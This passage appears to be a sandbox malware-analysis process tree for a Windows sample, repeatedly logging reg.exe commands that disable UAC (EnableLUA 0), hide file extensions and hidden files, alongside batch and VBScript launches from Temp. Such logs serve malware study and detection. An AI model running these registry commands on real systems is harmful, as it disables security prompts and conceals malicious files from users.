reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
112⤵
PID:3908

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
113⤵
PID:3780

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
112⤵
- UAC bypass
PID:3916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AYgoscUo.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
112⤵
PID:1672

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
113⤵
PID:5060

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
113⤵
PID:2260

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
110⤵
PID:2100

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
110⤵
PID:3184

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
111⤵
PID:2224

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
110⤵
- UAC bypass
- Modifies registry key
PID:4124

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
111⤵
PID:2648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oosEAAAw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
110⤵
PID:2764

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
111⤵
PID:1392

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
111⤵
PID:4860

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
108⤵
- Modifies visibility of file extensions in Explorer
PID:3172

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
109⤵
PID:1656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
108⤵
PID:1192

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
108⤵
PID:1920

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
109⤵
PID:1512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hsEcUkcw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
108⤵
PID:5116

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
109⤵
PID:4584

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
109⤵
PID:4712

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
106⤵
PID:3280

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
106⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
106⤵
- UAC bypass
- Modifies registry key
PID:1668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jSMUsUwo.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
106⤵
PID:4868

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
107⤵
PID:3516

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
104⤵
PID:408

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
104⤵
PID:4696

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
104⤵
- UAC bypass
PID:1136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nQssUEkE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
104⤵
PID:2224

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
105⤵
PID:4672

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
102⤵
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
102⤵
PID:4788

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
102⤵
- UAC bypass
PID:2456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\issgUQIo.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
102⤵
PID:2260

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
103⤵
PID:4912

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
100⤵
- Modifies visibility of file extensions in Explorer
PID:1708

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
100⤵
PID:2760

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
100⤵
- UAC bypass
- Modifies registry key
PID:4384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kKYoogsg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
100⤵
PID:2588

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
101⤵
PID:544

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
98⤵
PID:2472

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
98⤵
- Modifies registry key
PID:2372

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
98⤵
- UAC bypass
PID:2380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\geUgwMMs.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
98⤵
PID:1256

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
99⤵
PID:1972

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
96⤵
- Modifies visibility of file extensions in Explorer
PID:4712

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
96⤵
PID:3556

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
96⤵
PID:3700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pEgYEIME.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
96⤵
PID:2320

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
97⤵
PID:4988

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
94⤵
PID:1644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
94⤵
- Modifies registry key
PID:876

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
94⤵
- UAC bypass
- Modifies registry key
PID:4648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xmgIoMcI.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
94⤵
PID:2488

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
95⤵
PID:3908

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
92⤵
- Modifies visibility of file extensions in Explorer
PID:1756

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
92⤵
- Modifies registry key
PID:3516

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
92⤵
PID:1668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hSkEkAYM.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
92⤵
PID:944

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
93⤵
PID:2544

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
90⤵
PID:4440

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
90⤵
- Modifies registry key
PID:3064

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
91⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
90⤵
- UAC bypass
PID:3244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OMIYwYsc.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
90⤵
PID:2792

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
91⤵
PID:4824

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
88⤵
- Modifies visibility of file extensions in Explorer
PID:2056

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
89⤵
PID:844

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
88⤵
PID:1652

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
88⤵
- Modifies registry key
PID:4236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sAYEUMcc.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
88⤵
PID:688

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
89⤵
PID:5108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
86⤵
PID:3028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
86⤵
PID:3604

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
86⤵
PID:2320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MyMUAEcA.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
86⤵
PID:2372

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
87⤵
PID:5028

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
87⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
84⤵
- Modifies visibility of file extensions in Explorer
PID:4848

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
85⤵
PID:3684

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
84⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
84⤵
- Modifies registry key
PID:4316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iuQcwkcU.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
84⤵
PID:220

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
85⤵
PID:2724

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
82⤵
PID:3424

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
82⤵
- Modifies registry key
PID:2280

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
82⤵
- UAC bypass
PID:548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TwQMkcQk.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
82⤵
PID:4920

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
83⤵
PID:4788

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
83⤵
PID:2324

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
80⤵
PID:3716

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
80⤵
- Modifies registry key
PID:4784

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
81⤵
PID:4696

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
80⤵
- UAC bypass
PID:1124

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pIYwggAA.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
80⤵
PID:1416

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
81⤵
PID:4396

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
78⤵
- Modifies visibility of file extensions in Explorer
PID:5056

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
78⤵
PID:4584

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
79⤵
PID:2616

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
78⤵
PID:4560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HKIUQcIw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
78⤵
PID:3436

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
79⤵
PID:1264

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
76⤵
PID:1888

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
76⤵
PID:3556

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
77⤵
PID:3732

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
76⤵
PID:3020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OywowwoQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
76⤵
PID:4840

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
77⤵
PID:4496

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
74⤵
- Modifies visibility of file extensions in Explorer
PID:4068

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
75⤵
PID:1996

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
74⤵
PID:2212

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
74⤵
PID:2676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YOAoYQMc.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
74⤵
PID:2944

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
75⤵
PID:8

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
72⤵
- Modifies registry key
PID:3908

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
72⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
72⤵
PID:2324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YUcUogsQ.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
72⤵
PID:2620

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
73⤵
PID:3320

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
70⤵
PID:408

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
70⤵
PID:3672

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
70⤵
- UAC bypass
PID:4952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oKEwsIoE.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
70⤵
PID:2488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
71⤵
PID:760

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
71⤵
PID:4192

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
68⤵
- Modifies visibility of file extensions in Explorer
PID:4884

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
68⤵
PID:4508

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
69⤵
PID:3052

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
68⤵
PID:844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VuUcMUIg.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
68⤵
PID:3224

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
69⤵
PID:4524

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
69⤵
PID:3964

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
66⤵
PID:2068

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
66⤵
PID:3700

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
66⤵
- UAC bypass
PID:2492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PGEUYwAM.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
66⤵
PID:4132

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
67⤵
PID:2824

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
64⤵
PID:1308

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
65⤵
PID:4188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
64⤵
PID:2040

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
65⤵
PID:856

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
64⤵
- UAC bypass
PID:452

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
65⤵
PID:4964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JgQkcYgw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
64⤵
PID:4752

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
65⤵
PID:1588

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
62⤵
- Modifies visibility of file extensions in Explorer
PID:968

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
62⤵
PID:2396

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
62⤵
PID:2156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nkUoUkUo.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
62⤵
PID:2252

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
63⤵
PID:4540

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
60⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2488

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
60⤵
PID:632

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
60⤵
PID:1708

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
61⤵
PID:4660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BIsgEsAw.bat" "C:\Users\Admin\AppData\Local\Temp\ff284a9fa89bfeb02e4ebab752065b79.exe""
60⤵
PID:3344

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
61⤵
PID:816

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
58⤵
PID:4348

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
58⤵
PID:4236

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
58⤵
- UAC bypass
PID:3264

C:\Windows\SysWOW64\cmd.exe
